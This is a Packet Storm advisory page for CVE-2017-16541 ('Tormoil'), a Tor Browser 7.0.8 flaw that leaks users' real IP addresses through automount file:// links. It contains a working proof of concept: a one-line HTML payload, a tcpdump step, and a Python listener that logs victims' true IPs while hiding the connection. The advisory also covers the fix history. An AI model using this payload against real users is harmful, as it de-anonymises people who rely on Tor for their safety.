what you don't know can hurt you

Tor Browser 7.0.8 Information Disclosure

Tor Browser 7.0.8 Information Disclosure
Posted Sep 11, 2018
Authored by Filippo Cavallarin

This write up holds the details for the Tor Browser information disclosure vulnerability as discussed in CVE-2017-16541. Version 7.0.8 is affected.

tags | exploit, info disclosure
advisories | CVE-2017-16541
MD5 | 271de236533c8c6c6b398877415184db

Tor Browser 7.0.8 Information Disclosure

Change Mirror Download
Hi,
there is the details for CVE-2017-16541 (Tor Browser information disclosure),

More infos at: https://www.wearesegment.com/research/tormoil-deanonymize-tor-browser-users-with-automount/



Tor Browser version 7.0.8, and probably prior, for Mac OS X and Linux, is affected by an information disclosure vulnerability that leads to full de-anonymization of website visitors using just a single html tag. The vulnerability also affects Firefox (ver <= 62.0 / 60.2.0 ESR).



Vulnerability Details

The vulnerability exists because Firefox fails to prevent automount/autofs to be called within a webpage using file:// handler.
Basically automount is a program that allows NFS mount points to be automatically mounted when accessed. For example it can be configured to trigger a NFS connection to test.com:/mydir when /localdir is accessed from client machine.
Automount can also be configured to allow a path starting with a/net/a to specify the remote server address and path, so als /net/test.com/aa will trigger an NFS connection to test.com. This is the default configuration on Mac OSX.
This functionality can also be triggered in many ways from a webpage by calling the file:// handler, for example with: <link href=afile:///net/test.com/a.cssarel=astylesheeta>.
NFS mount points are handled by the kernel so there is no way for a browser to tunnel their connections thru a proxy.
An interesting part is that this vulnerability can be exploited even if javascript is disabled.
This vulnerability only affects Mac OS X users with default configuration and Linux user with automount package installed and configured properly.


PoC

To demostrate this issue follow the steps below:

host an html page with the following content:
<link href='file:///net/12.12.12.12/a.css' rel='stylesheet'>

1.run a atcpdump port 111a
2.load the previously hosted page into Tor Browser

watch the output of tcpdump, you should see UDP packets sent to 12.12.12.12
To exploit this vulnerability to deanonymize a Tor Browser user an attacker needs to host the malicious page on a server he/she owns, trick the victim into load the malicius page and watch the output of tcpdump (running on the webserver).
Doing so the browser of the victim will show a loading indicator until a successful NFS is preformed of until the NFS timeout is reached.
As a result the victim may notice that something unusual is happening. To prevent this the attacker has (at least) two options:

1.configure a NFS server so the victimas machine will complete the connection without waiting
2.listen to portmap requests (UDP port 111) and immediatley reject the connection

The problem of the first solution is that the mountpoint may remain visible to the victim and it also may leave some traces on the log files.
The second solution involves some python code that terminates gracefully RPC requests:

BIND_ADDR = "0.0.0.0"
BIND_PORT = 111

sok = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sok.bind((BIND_ADDR, BIND_PORT))
except Exception as e:
print e
sys.exit(1)

print "Waiting for victims on UDP port %d\n" % BIND_PORT
while True:
data, addr = sok.recvfrom(1024)
ip = addr[0]
print("TRUE IP: %s" % ip)

# reply with PROGRAM_NOT_AVAILABLE to drop connection
# first 4bytes are packet id, the last 4 mean "port 0"

rpl = data[:4] + "\x00\x00\x00\x01" + bytearray(20)

if not sok.sendto(rpl, addr):
print "Error sending reply to %s" % ip

Due to itas nature, Tormoil can de-anonymize both visitors of hidden services and visitors of regular internet websites and can also be ainjecteda using Man In The Middle techniques (ex exit node owners).


History

This vulnerability has been discovered and reported to the Tor Project on 10-26-2017 and got fixed in a matter of days.
Tor Browser is based on Firefox that was also affected by the same vulnerability, but since the Firefox team rated this vulnerability as moderate it took longer to get fixed.
In the meantime the Tor Browser team applied a temporary fix to their browser that prevents any access to file:// resources.
This was a perfectly coherent solution since the focus of Tor Browser is useras anonymity. However this fix broke a legitimate functionality of a anormala browser so the Firefox team didat implemented this solution.
Instead they worked on a solution for months to build a blacklisting mechanism that filters out adangerousa paths and prevents the trigger of automount.



Solution

Update Tor Browser to version 7.0.9

Update Firefox to version 62.0 or 60.2.0 ESR



References

https://blog.torproject.org/tor-browser-709-released
https://www.wearesegment.com/research/tormoil-deanonymize-tor-browser-users-with-automount/


Credits

Filippo Cavallarin (filippo.cavallarin@wearesegment.com)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    1 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close